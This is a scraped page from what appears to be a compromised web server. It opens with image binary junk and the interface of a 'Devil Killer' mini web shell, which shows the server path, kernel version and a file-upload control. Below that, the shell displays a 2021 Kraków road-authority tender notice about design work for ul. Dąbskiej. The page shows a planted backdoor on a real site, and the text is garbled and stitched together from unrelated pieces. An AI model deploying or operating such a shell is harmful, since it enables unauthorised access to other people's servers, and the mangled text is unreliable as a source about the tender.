JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210429/0004304301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00043043 z dnia 2021-04-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Rozbudowa ul. Dąbskiej – opracowanie dokumentacji projektowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Miasta Krakowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 357116163</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Centralna 53</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-586</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdmk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdmk.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa ul. Dąbskiej – opracowanie dokumentacji projektowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4d2bc86e-a7eb-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00043043</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000711/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.53 Rozbudowa ul. Dąbskiej - opracowanie dokumentacji projektowej </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdmk.krakow.pl/informacje/tryb-podstawowy-art-275-pkt-1-znak-sprawy-14-iv-2021 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl,https://epuap.gov.pl/wps/portal , sekretariat@zdmk.krakow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywasię przy użyciu MiniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl ,ePUAPu,dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej,b)Zamawiający informuje, iż przekazywanie oferty oraz dokumentów i oświadczeń składanych wraz zofertą, odbywa się przy użyciu MiniPortalu https://miniportal.uzp.gov.pl , ePUAPuhttps://epuap.gov.pl/wps/portal (zapośrednictwem dedykowanego formularza dostępnego na ePUAPoraz udostępnionego przezMiniPortal - Formularz do komunikacji),c) Przekazywanie pozostałychdokumentów i oświadczeń może nastąpić w sposób określony powyżej w lit. c) lub za pośrednictweme-mail:sekretariat@zdmk.krakow.pl . Każda ze stron na żądanie drugiej niezwłocznie potwierdzafaktotrzymania przesłanego za pośrednictwem e-mail pisma lub dokumentu lub wiadomości,d)Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,elektronicznych kopiidokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciuopisane zostały wRegulaminie korzystania z systemu MiniPortal oraz Warunkach korzystania zelektronicznej platformyusług administracji publicznej ePUAP,e) W przypadku składania oferty wpostaci elektronicznej opatrzonej podpisem zaufanym, Wykonawca musi dysponować profilemzaufanym, który jest środkiemidentyfikacji elektronicznej, umożliwiający złożenie podpisu zaufanego.Profil zaufany to potwierdzonyzestaw danych, które jednoznacznie identyfikują jego posiadacza wusługach podmiotów publicznych.Profil zaufany można założyć na stronie https://pz.gov.pl/pz/index ,f)W przypadku składania oferty wpostaci elektronicznej opatrzonej podpisem osobistym, Wykonawcamusi dysponować e-dowodem,posiadającym certyfikat podpisu osobistego, który potwierdzaprawdziwość danych posiadacza.Ponadto do używania podpisu z wykorzystaniem e-dowodukonieczne jest posiadanie odpowiedniego czytnika kart zbliżeniowych,g) W przypadku składaniaoświadczeń i dokumentów w formie elektronicznej należy je podpisać kwalifikowanym podpisemelektronicznym, h) Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnychdotyczących korespondencjielektronicznej zawieraz SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja zamawiającego (administratora) oprzetwarzaniudanych osobowych (Wykonawcy) - Klauzula informacyjna z art. 13 RozporządzeniaOgólnego oOchronie Danych Osobowych (RODO) związana z postępowaniem o udzieleniezamówieniapublicznego. Zamawiający zgodnie z art. 13 ust. 1 i 2 rozporządzenia ParlamentuEuropejskiego i Rady(UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych wzwiązku zprzetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych orazuchyleniadyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z04.05.2016, str.1), dalej „RODO”, informuje, że: • administratorem Pani/Pana (Wykonawcy) danychosobowych jest:Zarząd Dróg Miasta Krakowa, ul. Centralna 53, 31-586 Kraków, centrala tel. +48 (12)616 7000, fax:+48 (12) 616 7417, email: sekretariat@zdmk.krakow.pl , • inspektorem ochrony danychosobowych wZarządzie Dróg Miasta Krakowa jest Pan Leszek Marmon, e-mail: iod@zdmk.krakow.pl ,•Pani/Panadane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanymzprzedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym wtrybiepodstawowym bez przeprowadzenia negocjacji,• odbiorcami Pani/Pana danych osobowych będąosobylub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18oraz art.74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz.2019 zpóźn. zm.), dalej „ustawa Pzp”,• Pani/Pana dane osobowe będą przechowywane, zgodnie z art.78 ust.1 i ust. 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzieleniezamówienia, ajeżeli okres obowiązywania umowy przekracza 4 lata, okres przechowywania obejmujecały okresobowiązywania umowy, • obowiązek podania przez Panią/Pana danych osobowychbezpośrednioPani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawyPzp, związanymz udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencjeniepodaniaokreślonych danych wynikają z ustawy Pzp,• w odniesieniu do Pani/Pana danychosobowych decyzjenie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22RODO,• posiada Pani/Pan:-na podstawie art. 15 RODO prawo dostępu do danych osobowychPani/Pana dotyczących, -napodstawie art. 16 RODO prawo do sprostowania Pani/Pana danychosobowych *,-na podstawie art. 18RODO prawo żądania od administratora ograniczenia przetwarzaniadanych osobowych zzastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **,-prawo downiesienia skargi doPrezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, żeprzetwarzanie danychosobowych Pani/Pana dotyczących narusza przepisy RODO,• nie przysługujePani/Panu: -w związku zart. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; -prawo do przenoszeniadanych osobowych, o którym mowa w art. 20 RODO; -na podstawie art. 21RODO prawo sprzeciwu,wobec przetwarzania danych osobowych, gdyż podstawą prawnąprzetwarzania Pani/Pana danychosobowych jest art. 6 ust. 1 lit. c RODO. Informacja:* Wyjaśnienie:skorzystanie z prawa dosprostowania nie może skutkować zmianą wyniku postępowania o udzieleniezamówienia publicznegoani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraznie może naruszaćintegralności protokołu oraz jego załączników. ** Wyjaśnienie: prawo doograniczenia przetwarzanianie ma zastosowania w odniesieniu do przechowywania, w celuzapewnienia korzystania ze środkówochrony prawnej lub w celu ochrony praw innej osoby fizycznej lubprawnej, lub z uwagi na ważnewzględy interesu publicznego Unii Europejskiej lub państwaczłonkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">14/IV/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a)	Przedmiotem niniejszego zamówienia jest usługa polegająca na opracowaniu dokumentacji dla rozbudowy ul. Dąbskiej w Krakowie,b)	Zamawiający opisał przedmiot zamówienia za pomocą: •	Projektowanych Postanowień Umowy (PPU) – załącznik nr 2 do SWZ,•	Zakresu rzeczowego – załącznik nr 9 do SWZ,•	Warunków technicznych – załącznik nr 12 do SWZ,•	Załącznika graficznego – załącznik nr 13 do SWZ,c)	Wymagany okres gwarancji jakości: •	Minimalny okres gwarancji wynosi 24 miesiące,•	Maksymalny okres gwarancji wynosi 36 miesięcy,licząc od dnia następnego po dniu podpisania końcowego protokołu zdawczo - odbiorczego. Oferty zawierające okres gwarancji jakości krótszy niż 24 miesiące zostaną odrzucone. d)	Zamawiający nie wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności związane z realizacją zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług, zgodnych z przedmiotem zamówienia podstawowego o których mowa w art. 214 ust. 1 pkt 7) ustawy Prawo zamówień publicznych w wysokości nieprzekraczającej 50% wartości zamówienia podstawowego. Warunki na jakich zostanie udzielone zamówienie będą odpowiadały warunkom niniejszego postępowania określone w Projektowanych postanowieniach umowy (PPU) i jego załącznikach oraz w SWZ. Zamówienia polegające na powtórzeniu podobnych usług zostaną udzielone w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta, która spełniawszystkiewymagania określone w SWZ oraz otrzyma największą liczbę punktów.Przy wyborzeofertyzamawiający będzie się kierował następującymi kryteriami: C – Cena brutto = 60% G –Długośćoferowanego okresu gwarancji jakości = 40% N=C+Ggdzie: N - łączna ilość punktów badanejoferty,C -ilość punktów badanej oferty w kryterium Cena brutto, G - ilość punktów badanej oferty wkryteriumdługość oferowanego okresu gwarancji jakości. 1. Cena brutto = 60% Wykonawca, któryzaproponujenajniższą cenę spośród ofert spełniających wymagania, otrzyma 60 punktów, natomiastpozostaliwykonawcy – odpowiednio mniej punktów, według poniższego wzoru: C= (Cenaminimalna)/(Cenabadanej oferty) ×60 pkt 2. Długość oferowanego okresu gwarancji jakości = 40%Sposób oceny:Zaproponowany okres gwarancji jakości: 24 miesiące – 0pkt, Zaproponowany okresgwarancji jakości:36 miesięcy – 40pkt,licząc od dnia następnego po dniu podpisania końcowegoprotokołu zdawczo -odbiorczego. 3. Zamawiający przyjmuję że 1 pkt = 1 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość oferowanego okresu gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunkidotyczące:a) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawiawarunku wpowyższym zakresie. b) uprawnień do prowadzenia określonej działalnościgospodarczej lubzawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawiawarunku wpowyższym zakresie. c) sytuacji ekonomicznej lub finansowej: Zamawiający niestawia warunkuw powyższym zakresie. d) zdolności technicznej lub zawodowej: • Wykonawcamusi posiadaćwiedzę i doświadczenie, tj. w okresie ostatnich 3 lat przed upływem terminuskładania ofert, ajeżeli okres prowadzenia działalności jest krótszy – w tym okresie zrealizowałco najmniej jedną usługę polegającą na opracowaniu dokumentacji projektowej dotyczącej rozbudowy drogi o długości co najmniej 200m wraz z uzyskaniem decyzji ZRID,•	Wykonawca musi dysponować co najmniej po jednej osobie posiadającej uprawnienia do projektowania bez ograniczeń w specjalności:1)	inżynieryjnej drogowej, 2)	instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych, wodociągowych i kanalizacyjnych,3)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,UWAGA Zamawiający dopuszcza posiadanie w/w uprawnień do projektowania bez ograniczeń przez tą samą osobę w ramach różnych branż. 2. Ocenaspełnienia przez wykonawcę warunków o których mowa w niniejszej części specyfikacjinastąpina podstawie przedłożonych oświadczeń i dokumentów, których wykaz został określonywczęści IV SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Wykaz usług wykonanych, a w przypadku świadczeń powtarzającychsięlub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzeniadziałalnościjest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania ipodmiotów, narzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodówokreślających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, októrych mowa,są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługizostaływykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, ajeżeliwykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –Ogłoszenie nr z dniaBiuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługioświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłychnadalwykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywaniepowinny byćwystawione w okresie ostatnich 3 miesięcy – wg zał. nr 7 do SWZ, UWAGA JeżeliWykonawcapowołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymiwykonawcami,wówczas w powyższym wykazie usług zobowiązany jest podać jedynie te usługi, wktórych wykonaniuwykonawca ten bezpośrednio uczestniczył. b) Wykaz osób, skierowanych przezwykonawcę dorealizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenieusług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,doświadczenia iwykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresuwykonywanychprzez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wgzał. nr 8 doSWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu o niepodleganiu wykluczeniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda załączenia przez Wykonawcę do ofertyprzedmiotowychśrodkówdowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykaz oświadczeń i dokumentów jakie Wykonawca musi dołączyć do oferty: a)wypełnionyformularz oferty – wg zał. nr 1 do SWZ (wzór),b) oświadczenie Wykonawcy ospełnianiuwarunków udziału w postępowaniu – wg zał. nr 3 do SWZ (wzór),c) oświadczenieWykonawcy oniepodleganiu wykluczeniu – wg zał. nr 4 do SWZ (wzór), d) zobowiązaniepodmiotuudostępniającego zasoby własne – wg. zał. nr 11 do SWZ (wzór), e) oświadczenie ozakresiewykonania zamówienia przez poszczególnych wykonawców wspólnie ubiegających sięozamówienie – wg zał. nr 5 do SWZ (wzór), f) oświadczenie podmiotu udostępniającegozasobywłasne o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu –wg.zał. nr 6 do SWZ, g) pełnomocnictwo do reprezentowania wykonawcy w niniejszymzamówieniu,jeżeli wymieniona osoba/osoby nie zostały wskazane do reprezentacji wewłaściwym rejestrzelub ewidencji działalności gospodarczej,h) pełnomocnictwo dla lidera(dotyczy podmiotówwspólnie ubiegających się o zamówienie tzw. „konsorcja oraz spółekcywilnych”),2. Szczegółowezasady dotyczące sporzadzania i przekazywania dokumentów iinformacji zawieraSWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnikadoreprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowaniawpostępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2. W tokuprowadzonegopostępowania komunikacja pomiędzy zamawiającym a wykonawcami wspólnieubiegającymi sięo udzielenie zamówienia następować będzie za pośrednictwem lidera(pełnomocnika) o którymmowa w pkt. 1 w części V SWZ. 3. W przypadku wspólnego ubieganiasię o zamówienie przezwykonawców, każdy z wykonawców wraz z ofertą składa oświadczenie oniepodleganiuwykluczeniu – wg zał. nr 4 do SWZ. 4. Spółka cywilna, jest kwalifikowana jakowykonawcywspólnie ubiegający się o udzielenie zamówienia, dlatego jej wspólnicy zobowiązanisąustanowić pełnomocnika do reprezentowania w postępowaniu albo reprezentowania wpostępowaniu i zawarcia umowy. Pełnomocnictwo musi być załączone do 